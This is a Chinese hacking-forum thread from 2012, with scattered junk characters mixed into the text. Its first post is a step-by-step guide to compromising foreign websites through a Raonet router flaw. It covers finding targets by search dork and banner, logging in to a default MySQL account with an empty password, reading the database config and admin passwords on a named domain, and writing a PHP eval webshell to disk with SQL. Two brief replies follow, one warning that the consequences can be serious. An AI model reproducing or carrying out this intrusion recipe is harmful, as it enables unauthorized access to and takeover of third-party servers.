找回密码
 立即注册
查看: 3742|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:
2 U+ R& I, j0 k9 o
& J7 {+ n  N* `- p- B. Z5 `1:google搜索'Raonet Subscriber Ethernet Router'
3 d; W! Z( n- {# `  J
0 M- v: h! X3 G! C  i2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
% Q: m0 u# g/ a2 `3 T+ g1 S' H( M5 a  r$ o3 r, r- h4 v
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。. P# N7 {6 ?2 ]# ~+ @9 d  J# _
  C; {% ]$ O# T$ Z& q; E  k- y
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......4 ]4 t9 `) r: |, p9 S/ |9 D9 m8 ?
4 d/ `5 \/ Z" M9 I9 j/ {

' A( U: C( L+ [2 k8 _: ^- W* W1 S& a/ |2 z; K
入侵步骤:1 F, u, d# E( I. P7 Q9 o
! h0 C9 n! Z$ e) l1 r) ^
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
: Y) A) `/ N+ j& j
0 e2 V- B" x) A- q9 r2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
' ?5 ~1 A: a4 G# V9 I! b% p3:得到密码后连接,查看GUI管理密码:% Q8 j" |, o) X. ?
use ser_500
" {- [, x' R: d4 S9 W' \, Wselect id,passwd from user;3 ^4 F* X& g* T
4:通过数据库写入webshell,执行命令:
0 _6 H% N9 |! P) h7 X3 d; H0 R2 }" Kuse mysql;. z- t, @( x4 p% [& L7 [2 Q
create table ok(cmd TEXT);
- L) i  s  ~5 h- |insert into ok values("<?php @eval($_POST[cmd])?>");
4 G6 i; H7 k5 ]' I/ y# O1 N9 xselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
; v  E( l8 a& X( t6 x- k6 B  E$ ^, Wdrop table ok;1 \* R6 R3 i$ h9 D! p. }/ C
: }  p/ J+ Q4 m' t2 E* T
5:连接后门shell.php - i% J0 J0 O/ j/ I5 W

" U. X2 c+ `9 D4 y: U6. 搞定!% ^8 H) e6 ?0 ~+ y; [

; i* S) X$ c9 I
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表